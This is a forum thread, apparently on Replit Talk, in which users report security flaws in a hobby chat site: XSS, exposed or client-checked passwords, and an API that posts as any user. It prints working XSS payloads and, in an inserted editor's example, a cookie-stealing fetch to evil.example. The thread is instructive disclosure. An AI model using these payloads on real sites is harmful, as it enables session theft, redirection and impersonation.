Chit Chat - A server based social media site
GameDev46 (207)

What is Chit Chat?

Chit Chat is a website where you can chat to a larger community of people and watch as your messages are permanently saved to my custom node.js server!

Why is it useful?

Chit Chat is useful as you can ask and talk to a larger community of friendly users and if anything ever goes bad, just simply click the report button on the messages and it will get sent to me!

How did I do it?

As I said before, I used a custom node.js server to save and load messages and who they were sent by, and as for the accounts, all the passwords are encoded so nobody is going to hack into your account!

Remember to upvote if you liked the project!!

Please open the project up in a separate tab otherwise it will take longer to load the comments up, and nobody likes waiting XD!

Also, please be patient with the server as it can be slightly slow at times, so just give it a sec as it has to fetch a lot of data!

And remember to upvote if you like it, it only takes a second to do it! Hope you guys enjoy! Bye! =D

Comments
YodaCode (116)

Cool, but not cool. Here's what needs to be fixed:

1. XSS issues

Anyone can add CSS or JavaScript that runs with a message. If you try loading it right now, it won't load, because I added styles that hid every element.

2. Passwords are public

This is a really big issue. Either fix the passwords, or warn people that their passwords are not only unencrypted and un-hashed, but they're also public for anyone to see.

3. Grow up

How would I feel? I would feel like I shouldn't have XSS issues and storing passwords publicly without people knowing. This is actually a security issue and needs to be taken seriously. We're not ruining your life, and if your entire life is just making programs that have security issues and then calling people 5-year-olds, then you need to get a life.

Edit: 4. You can browse any website in an iframe using this message:

<link rel="stylesheet" href="https://static.yodacode.repl.co/xss2.css"><iframe id="d" src="https://geekprank.com/fbi-warning/"></iframe>

Edit: 5. Stop lying about encrypted passwords

Not only are you hiding the fact that our passwords aren't secure, but you're lying about it.

RahulChoubey1 (172)

@YodaCode where are the passwords? I want to see if mine's stored.

YodaCode (116)

@RahulChoubey1 I think he hid them, but it's still possible to get to them.

GameDev46 (207)

@YodaCode Ok, look. I don’t want this to turn into a mass argument as that would benefit no one! So I would like to thank you for all these things that need to be added and I will try my best to do that 😀! The passwords are encoded and stored in a private database and I am working on trying to make them even more secure. I have also added an xss filter a few days ago and it is now impossible to break the website with xss or css. But thank you @YodaCode for all the help!

YodaCode (116)

@GameDev46

it is now impossible to break the website with xss or css.

I'd have to disagree with you on that one. Try pasting this into the chat box:

<link href="https://static.yodacode.repl.co/none.css" rel="stylesheet" type="text/css">
YodaCode (116)

Look: My point is, don't allow raw HTML parsing. Ever. If you want markdown, make a markdown system. Don't take raw data from users and distribute it to other people. I'm not saying you're a bad developer or whatever, I just want you to take people's security seriously. People may have used their actual Replit username and password and have their account details leaked. People could have used https://grabify.link and an <iframe> to get people's IP addresses. Any number of things could have been done just because you forgot to safely store passwords or safely handle user data. Not to mention the fact that your buddies are trying to get me banned from Replit because I raised awareness about the fact that this repl is unsafe. I tried to execute code that wasn't malicious just to see if it would work, and I tried to report my findings so that you could fix it. There are a number of things I could have done that were much worse, but I was only trying to help. Here's what you should do:

1. Be honest

Tell people that you made a mistake and try and fix it. Don't lie about unsecure passwords or try and cover up your mistakes.

2. Hash passwords

You should never need user passwords except for when checking that a user had a correct password, which is why you should hash them. (And make sure they're hashed on the server, as well.)

3. Use innerText instead of innerHTML

It may lose markup capabilities, but I'd rather have to use plaintext than get redirected to a tracker/virus/p*rn website.

There. That's all I have to say. Now I'll stop bugging you if you listen and do the above. When something gets 128 upvotes on the Replit talk pages, a lot of people have used it. That means a lot of peoples' security is at risk, and even more peoples' security will be put at risk if you don't fix this.

YodaCode (116)

@GameDev46 Still thinks his filter is working just fine:

GameDev46 (207)

@YodaCode Thank you for the feedback! I am trying my best to keep users' data safe and realize that this will probably be a problem in the future. I already have a basic filter when it comes to running JavaScript and already have a link and JavaScript blocker. I even filter anything starting with http. The way the filter works is if it detects ANY unallowed chars or strings in the message, then the entire thing is innerText, otherwise it is innerHTML

RolandJLevy (1083)

@GameDev46 can you let me know which xss filter you are using?

YodaCode (116)

@GameDev46 THIS JUST IN

New way to bypass XSS filter.

  • Use // instead of https://
  • Style things with style = "" instead of style=""
  • Use built-in classes to mess up your message
  • onkeyup, onkeydown, onkeypress smh
YodaCode (116)

@GameDev46 No; that's what you're missing.

Just use innerText.

There are so many more methods I could try if I had time. This is a loophole that allows anyone to manipulate the site if they put in enough time. Please do these things, it doesn't hurt you at all:
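
Added example (editor's note, not code from the thread or from Chit Chat): the filter GameDev46 describes is a blocklist (any "unallowed" substring sends the whole message to innerText, otherwise it goes to innerHTML), and the list above shows why that fails. The block below reconstructs a blocklist of that shape (the real list is not on the page, so this one is constructed), feeds it the bypasses from the thread plus the split-keyword eval trick YodaCode mentions later, and contrasts it with escaping every message, which is what innerText/textContent does for you. It also shows how to keep a little formatting (bold and italic) by escaping first and then adding only tags you choose, which is the "make a markdown system" approach. Runs under Node.js; nothing here touches a real DOM.

```javascript
// Added example, not Chit Chat's code. Blocklist filtering vs. escaping.

// A blocklist in the spirit of the one GameDev46 describes. The real list is
// not on the page; this one is constructed for the demonstration.
const BLOCKED = ['<script', 'javascript:', 'http', 'onclick=', 'onload=', 'style=', 'location', 'window'];

// Returns which DOM property the filtered page would use for this message.
function blocklistFilter(message) {
  const lower = message.toLowerCase();
  const hit = BLOCKED.some(bad => lower.includes(bad));
  return { prop: hit ? 'innerText' : 'innerHTML', value: message };
}

// Escape the five characters HTML cares about. In the browser,
// `el.textContent = message` (or innerText) achieves the same with no string work.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Allowlist formatting: escape first, then add only the tags we choose to
// support (**bold** and _italic_). User text is never interpreted as HTML.
function renderMarkdownLite(message) {
  return escapeHtml(message)
    .replace(/\*\*([^*]+)\*\*/g, '<strong>$1</strong>')
    .replace(/_([^_]+)_/g, '<em>$1</em>');
}

// Constructed payloads matching the bypasses listed in the thread. None contains
// a blocked substring, so the blocklist hands every one of them to innerHTML.
const BYPASSES = [
  '<link rel="stylesheet" href="//static.example/none.css">',                  // "//" instead of "https://"
  '<div style = "position:fixed;inset:0;background:#000">',                     // space before "="
  '<input autofocus onkeyup="fetch(\'//evil.example/?c=\'+document.cookie)">',  // handler not on the list
  '<iframe src="//geekprank.com/fbi-warning/"></iframe>',                       // frame any site
  "<img src=x onerror=\"eval('loca' + 'tion.replace(&quot;//evil.example&quot;)')\">", // keyword split
];

// True if the blocklist would let the payload reach innerHTML.
function passesBlocklist(payload) {
  return blocklistFilter(payload).prop === 'innerHTML';
}

// True if the string still contains something a browser would parse as a tag.
function containsLiveTag(html) {
  return /<[a-z!/]/i.test(html);
}
```

The point of `BYPASSES` is not the five specific strings; it is that any blocklist is a guess about what attackers will type, while escaping (or textContent) needs no guess at all.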

StonksAreRising (29)

Instead of bullying @GameDev46 How about we help him?

GameDev46 (207)

@StonksAreRising I have a database now, so no one can see the passwords and usernames again XD

GameDev46 (207)

@StonksAreRising Yes XD Do you know who is doing it?

StonksAreRising (29)

@GameDev46
Nope! And this is where mods come in!

NathanTodd2 (17)

@GameDev46 got it https://replit.com/@NathanTodd2/chit-chat-haked click the link, logged in console, hope you can fix this
edit: you could use some code from this https://replit.com/@Crosis/chat
P.S. not sure if you can see this, Crosis might have made it a private repl, I am an editor

Yimmee (31)

@StonksAreRising i was just gonna say mods and use sign in with replit

ParrotDev (21)

@GameDev46 could I be a mod? Is there signup? also @StonksAreRising hello I have not talked to you in a while

GameDev46 (207)

@ParrotDev Because I had to move all the logins to a database it is hard to do, but I will try my best to XD

StonksAreRising (29)

@ParrotDev Woah hey parrot its been a long time!

StonksAreRising (29)

@GameDev46
Can Walmart become a mod too?

RolandJLevy (1083)

@StonksAreRising reading the comments, I don't think anyone has been bullying @GameDev46. @YodaCode has taken the time to point out some important issues and help him resolve them. Receiving feedback and advice is part of being a developer

YodaCode (116)

@RolandJLevy Thank you for understanding. These people are trying to get me kicked off of Replit when I'm just trying to protect people's personal data like passwords, IP addresses, location data, and more. This is a serious issue and the fact that @GameDev46 doesn't even acknowledge it is scary.

RolandJLevy (1083)

@YodaCode I can see that you're only trying to help. Anyone trying to get you kicked off replit has misunderstood your intention. Passwords should always be hashed with something like bcrypt and stored in a database. That's basic common sense. Also, not having any protection against XSS is another basic mistake.

I've been misunderstood in the past because people interpret help as a criticism. But let's face it, when you're working as a developer in a team, your code is going to constantly be questioned and scrutinised - and we know that's a good thing! How else do we learn and grow?

I hope @GameDev46 can learn from this experience and appreciate that your concern is coming from a good place 👍

GameDev46 (207)

@YodaCode I try my best to keep users safe, and I admit that when I first put Chit Chat out, the defences were awful 🤣!! I am very sorry that people are trying to get you kicked though and hope you aren’t as you are showing me how to improve Chit Chat and make it more friendly for others!!

GameDev46 (207)

@RolandJLevy I will definitely learn from this 😂!! As this was my first project to use backend scripting (an express server) I had never really touched upon defences before!! But thankfully the community helped me to defend the system better!! 😀

RolandJLevy (1083)

@GameDev46 I think this is great for your first project. I'm glad to hear that you're being open to feedback. There are a lot of experienced people out there who can give really helpful advice. Keep up the good work! 😀

YodaCode (116)

First, @RolandJLevy, thanks. I agree and hope that everyone can learn from this experience. My only issue is that @GameDev46 still uses innerHTML and doesn't hash passwords. He "encrypts" them (he actually encodes them; he thinks encoding and encrypting are the same) and still isn't fixing it. When using innerHTML, there is always something else that can be exploited, and it's only a matter of time until someone takes advantage of it when lots of people are online and grabs IP addresses and location information from everyone. @GameDev46, would you want that happening to you? Your IP address exposed, redirected to a NSFW website, and your password taken? Oh, and, by the way, blocking certain JavaScript keywords like location or window won't work, because you can just eval('loca' + 'tion.replace(["h","t","t","p","s",":","/","/"].join("") + "google.com");').

GameDev46 (207)

@YodaCode First, I do know the difference between encoding and encrypting 😂! And have just replaced it so it uses innerText instead of innerHTML!!

RolandJLevy (1083)

@YodaCode thanks for your message. On a positive note, your comments and feedback are teaching people some important aspects of software development. It's up to them whether they listen to you or not, and in the long run they will find out the seriousness of the consequences when not taking security seriously. Thanks for caring 🙌

XCode101 (33)

A social media site???!?!?!?!
Not to lie but the password storage is bad.
Got To:
https://test-1.thecoder12398.repl.co
Here is a list of passwords and usernames from this site.

XCode101 (33)

@deadartz
It is just a small overview.

GameDev46 (207)

@Thecoder12398 I know that the storage isn’t that safe, but what is so wrong with you that you would waste your time writing it out on a text file! I spent a lot of time on this chat app and you people just walk all over it! How would you feel if you spent hours building a site like this and every 5 seconds some annoying 5 year old would come and ruin it all?!!

XCode101 (33)

@GameDev46
Sorry for ruining your project. It was not my intent to make you feel bad. The code is buggy and was meant to make it sure that you know that the site might be hacked. Sorry again.

GameDev46 (207)

@Thecoder12398 In that case it is fine XD It is just all the hackers that get me down as they find it funny to spam messages on my account! Which is why I have had to deactivate my account LOL! Thank you for understanding! =D

deadartz (18)

@GameDev46 "you're ruining my life by hacking my website on replit!!" 😥

GameDev46 (207)

@deadartz I just changed the logins to be put in a database! Good luck now LOL

cjmatthy09 (52)

@GameDev46 lifecycle of bugs in gamedev's programs:

  1. bug found
  2. bug used
  3. someone talks about it in repl talk
  4. gamedev rants and says it ruins their life when it doesnt
  5. bug fixed
GameDev46 (207)

@cjmatthy09 I am so close to no bugs now XD

cjmatthy09 (52)

there will always be some, they probably just arent discovered, or you cant fix it @GameDev46

GameDev46 (207)

@cjmatthy09 Yes, but hopefully all the hackers won't be able to hack the server anymore XD

StonksAreRising (29)

Bug found!
If you put your username as a special character you are not able to send messages!

GameDev46 (207)

@StonksAreRising I will take a look, thank you! =D

StonksAreRising (29)

@GameDev46
you said html still works for profile but its probably only console but I cannot access console on dumb school chromebook

brourbeinsus (2)

@StonksAreRising if you can’t use console on chrome book then here: javascript:(function%20()%20%7B%20var%20script%20=%20document.createElement('script');%20script.src=%22//cdn.jsdelivr.net/npm/eruda%22;%20document.body.appendChild(script);%20script.onload%20=%20function%20()%20%7B%20eruda.init()%20%7D%20%7D)();
It’s a bookmarklet with a dev tools clone

GameDev46 (207)

@StonksAreRising As in it still runs the HTML code in your chat boxes on users profiles

brourbeinsus (2)

Whoever made testbot needs to make it so it doesn’t spam, “bot sleeping for 60 seconds” all the time, as it is spamming the main chat, it also shouldn’t say command not found because it interferes with other bots like mine, SusBot. I tried typing in a command for my bot, and TestBot said that the command was not found. Just putting it out there.

CosmicBear (6)

@brourbeinsus TestBot also interferes with my bot but keep in mind that TestBot was the first bot built.

ImJustChillin (0)

@brourbeinsus Thanks for letting me know! Let me know if I should change anything else. I changed the request interval to 2 seconds. I also made it so it doesn't send messages when sleeping or a command is not found.

Sorry, I haven't really worked on Test Bot for a couple of weeks besides changing some minor things here and there. Sorry about that!

PlaTalented (2)

You can easily make a program that sends get requests in order to spam the site. Looks like someone did it with some random decimals...

StonksAreRising (29)

@PlaTalented
yeah I mentioned that in the chat

candies (156)

@GameDev46 add a feature where you can ban people by ip

mollthecoder (37)

Why can't I use mollthecoder as my username? Is one of the characters not a letter?

Yimmee (31)

Wait, you encrypt passwords? i thought you were supposed to hash them, so its supposedly impossible to reverse it.

deadartz (18)

@Yimmee, They can be printed in plaintext anyways if you know what you're doing on this site; the security is not good at all lol

Yimmee (31)

@deadartz wait why is this reported?
and i lost you immediately

deadartz (18)

@Yimmee The passwords of the website are sent in plaintext to the client

deadartz (18)

@Yimmee because the developer doesn't hash them and the decryption method is stored on the client

deadartz (18)

@Yimmee Passwords are also in plaintext in his replit; https://replit.com/@GameDev46/MainServer

Yimmee (31)

@deadartz and, WHY WOULD THE PASSWORD BE SENT TO THE CLIENT??????

deadartz (18)

@Yimmee because the client is the one that confirms if the password is correct obviously smh

deadartz (18)

@Yimmee see right here

        if (decodedPass == password.value) {
          sessionStorage.setItem('username', username);

          return;
        }
Yimmee (31)

@deadartz @GameDev46 hash ple........ nevermind. i dont know a useful package anyway..................................

deadartz (18)

@Yimmee well he should rewrite the login + backend if he really wanted it to be secure

Yimmee (31)

@deadartz isnt sessionStorage used to store the sid??????????
i mean, you dont NEED it, but......... whatever. most hacks happen remoteley anyway.

Yimmee (31)

@deadartz well, im going to try and do this my self then. and hopefully make it more secure.

deadartz (18)

@Yimmee sessionStorage is used to store the username around these parts partner B)

deadartz (18)

@Yimmee try, use replit's database and not a plaintext file; and hash <3

Yimmee (31)

@deadartz so hashing itself is not secure enough? you know what if that then im just gonna lean on replits' .env hiding. and no hash.
and it says "session" storage. probably not used for session but its not my fault its,,,, the inventor of js's.

deadartz (18)

@Yimmee hashing is secure enough; but you should never have it easy for people to get passwords even if they're hashed

sessionstorage can really be used for anything; not commonly used for usernames, that would be localstorage; sessionstorage would contain stuff like "LoginID"

Yimmee (31)

@deadartz but if it's secure enough, why cant i make it easy to get a hashed password??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

Yimmee (31)

@Yimmee Its not like im gonna accept hashed passwords for passwords

deadartz (18)

@Yimmee because its still technically someone's password? and some hash algorithms do end up having security flaws so it'd be better if you DONT just let anyone see them??

deadartz (18)

@Yimmee hashing is just setting a password to decrypt basically; if they get the hashed passwords and they brute dictionary attack it; if you used a common word you're screwed

Yimmee (31)

@deadartz okay so .env isnt safe either?

deadartz (18)

@Yimmee iirc replit changed env so you cant use it but they have their own environment, env is only as safe as your account is

Yimmee (31)

@deadartz (i know this is a little mean, but honestly, if this happens,) thats the users fault. mostly.

deadartz (18)

@Yimmee as a developer storing sensitive data, it is your job to keep it as secure as possible; thats why you hash it and store it in a database thats hard to get to?

Yimmee (31)

@deadartz its linked to my google acc, and my google password is ##########, so i think thats safe. no common words.

Yimmee (31)

thank you I finally know a secure way to leave passwords in the [email protected]

Yimmee (31)

@deadartz i have no idea how to use the replit db, and, REPLIT IS THE ONLY PEOPLE THAT SEES IT ANYWAYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY!
for the db its the same thing. someone can get my pw, change my server code, and console.log the db'd passwords. its hashed but db is safe too.

deadartz (18)

@Yimmee well yeah but i'd rather have a db than just text files or env alot easier to work with

Yimmee (31)

i also dk how to use a normal db [email protected]

Yimmee (31)

@deadartz dont worry im not using .env. im using using secrets

Infiniti20 (16)

@Yimmee I just turned 13. bruh

Infiniti20 (16)

@Yimmee lol its ok. you don't have to use express, but for any secure database, it's almost a must-have

Yimmee (31)

@Infiniti20 i have no idea about databases. i hear of it, but never used one. i honestly don't plan to start,,,,,,,,,,,,,,,,,,,

DigiGaming (1)

Bug!

If you click on your profile in the main page, then it will say that you can PM yourself.

GameDev46 (207)

@DigitalSharkYT I am still working on the private messaging system XD

Yimmee (31)

@DigitalSharkYT you can send an sms to yourself too. its free storage why are you relieving us of like 1mb of storage

PixiGem (100)

@GameDev46, Why ya throwing the F-Word!

I reported you in the website and this post

GameDev46 (207)

@HyperDev100 That isn’t me, that is a hacker

PixiGem (100)

@GameDev46 Like I believe you? it shows if the name is taken in the login page

GameDev46 (207)

@HyperDev100 As in they hacked into my account!

PixiGem (100)

@GameDev46 no they didn't, I tried it myself, they created another account called " GameDev46". they added a space at the beginning to get a similar name.
edit: Like repl.it warns you for any spaces in the name while we create an account, you can add that feature in your website

brourbeinsus (2)

@HyperDev100 there used to be a script you could paste into the console that allowed you to easily hack into accounts, but I’m pretty sure it’s fixed now

poetaetoes (316)

@HyperDev100 yes there is a site where everyone's password is saved

CosmicBear (6)

@HyperDev100 The hackers did actually hack his account

PythonLuv (17)

The login page seems to be broken

GameDev46 (207)

@PythonLuv I had to shut down the server to make it more well prepared against hackers! All back up now though! =D

nbbcsf (23)

@GameDev46 :( hash the password, not encrypt!

deadartz (18)

Love that you can just send a request to the API and it posts as any user

https://mainserver.gamedev46.repl.co/api/add?user=GameDev46&message=sheeeeesh

GameDev46 (207)

@deadartz Good luck with that now!! XD

JEFFJEFFJEF (3)

dont feel safe it ask for my password

tankerguy1917 (178)

@JEFFJEFFJEF You could just make a test account so you can see if you can trust it, and there wouldn't be too much that could be done with your password anyway, unless you use one that you use for an important account login or something else like that.

GameDev46 (207)

@tankerguy1917 Nobody is really going to hack your account XD

Dunce (65)

@JEFFJEFFJEF Why? As long as you don't use the same password as you use for other things it's fine.

RolandJLevy (1083)

Hi @GameDev46, I think your app is good. Have you thought about organising your files by putting your .js, .html and .css files in separate folders?

Also, I recommend organising your code into classes, like this: https://www.w3schools.com/js/js_classes.asp

It will improve the quality of your code.

LOLguy1123455 (24)

suddenly the buttons become unclickable

120FPS (0)

Could i be verified @GameDev46?

120FPS (0)

Could i be verified GameDev46?

ArranJohnston (0)

40 32 205 161 194 176 32 205 156 202 150 32 205 161 194 176 41

A1PHA1 (10)

I can stop it from crashing all the time, invite me to the server repl.

A1PHA1 (10)

@GameDev46 i know some code that really helped with Blabbr, one of my own chat apps, so i think it may work here too.

A1PHA1 (10)

@GameDev46 add some code that helped with blabbr, a chat app of my own

A1PHA1 (10)

Can you invite me to the server repl? I know how to make it stop crashing with message spam, i did it on Blabbr, a chat app.

RahulChoubey1 (172)

Hold on… how are there so many vulnerabilities? Could someone pentest my site?

DEANKASOZI (1)

Damn this is well made

RahulChoubey1 (172)

My username is excusemewut

RahulChoubey1 (172)

It keeps saying "Server is Unresponsive" or somethin